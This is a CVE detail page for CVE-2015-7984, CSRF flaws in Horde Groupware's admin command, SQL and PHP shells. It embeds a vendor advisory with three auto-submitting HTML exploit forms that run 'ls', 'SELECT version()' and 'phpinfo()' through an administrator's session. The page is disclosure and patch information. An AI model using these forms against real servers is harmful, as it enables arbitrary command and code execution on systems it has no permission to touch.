CVE-2015-7984 : Detail

CVE-2015-7984

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
1.36%V4
Network
2015-11-19
19h00 +00:00
2016-12-05
21h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in Horde before 5.2.8, Horde Groupware before 5.2.11, and Horde Groupware Webmail Edition before 5.2.11 allow remote attackers to hijack the authentication of administrators for requests that execute arbitrary (1) commands via the cmd parameter to admin/cmdshell.php, (2) SQL queries via the sql parameter to admin/sqlshell.php, or (3) PHP code via the php parameter to admin/phpshell.php.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 38765

Publication date : 2015-11-18 23h00 +00:00
Author : High-Tech Bridge SA
EDB Verified : No

Advisory ID: HTB23272 Product: Horde Groupware Vendor: http://www.horde.org Vulnerable Version(s): 5.2.10 and probably prior Tested Version: 5.2.10 Advisory Publication: September 30, 2015 [without technical details] Vendor Notification: September 30, 2015 Vendor Patch: October 22, 2015 Public Disclosure: November 18, 2015 Vulnerability Type: Cross-Site Request Forgery [CWE-352] CVE Reference: CVE-2015-7984 Risk Level: High CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H] Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered three Cross-Site Request Forgery (CSRF) vulnerabilities in a popular collaboration suite Horde Groupware, used by a variety of companies around the world. These vulnerabilities are very dangerous, since they can be used in targeted attacks against corporate clients. An attacker might be able to gain unauthorized access to information, stored in database, execute arbitrary commands on the server, compromise the entire application and perform attacks against application users and company’s infrastructure. 1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984 1.1 The vulnerability exists due to failure in the "/admin/cmdshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary system commands on the server. CSRF exploit below sends HTTP POST request to vulnerable script and instructs it to display output of "/bin/ls" command. As a result, you will see contents of "/admin/" directory: <form action="http://[host]/admin/cmdshell.php" method="post" name="main"> <input type="hidden" name="cmd" value="ls"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.2 The vulnerability exists due to failure in the "/admin/sqlshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary SQL queries with application’s database. The exploit code below executes "SELECT version()" query and displays version of current MySQL server: <form action="http://[host]/admin/sqlshell.php" method="post" name="main"> <input type="hidden" name="sql" value="SELECT version()"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> 1.3 The vulnerability exists due to failure in the "/admin/phpshell.php" script to properly verify the source of HTTP request. A remote attacker can trick a logged-in administrator to visit a malicious page with CSRF exploit and execute arbitrary php code on the server. The exploit code below executes the "phpinfo()" function and displays its output: <form action="http://[host]/admin/phpshell.php" method="post" name="main"> <input type="hidden" name="app" value="horde"> <input type="hidden" name="php" value="phpinfo();"> <input value="submit" id="btn" type="submit" /> </form> <script> document.getElementById('btn').click(); </script> ----------------------------------------------------------------------------------------------- Solution: Update to Horde Groupware 5.2.11 More Information: http://lists.horde.org/archives/announce/2015/001137.html ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23272 - https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in Horde Groupware. [2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

Products Mentioned

Configuraton 0

Horde>>Groupware >> Version From (including) 5.0.0 To (excluding) 5.2.11

Horde>>Groupware >> Version From (including) 5.0.0 To (excluding) 5.2.11

Horde>>Horde_application_framework >> Version From (including) 5.0.0 To (excluding) 5.2.8

Configuraton 0

Debian>>Debian_linux >> Version 8.0

References

https://www.exploit-db.com/exploits/38765/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.debian.org/security/2015/dsa-3391
Tags : vendor-advisory, x_refsource_DEBIAN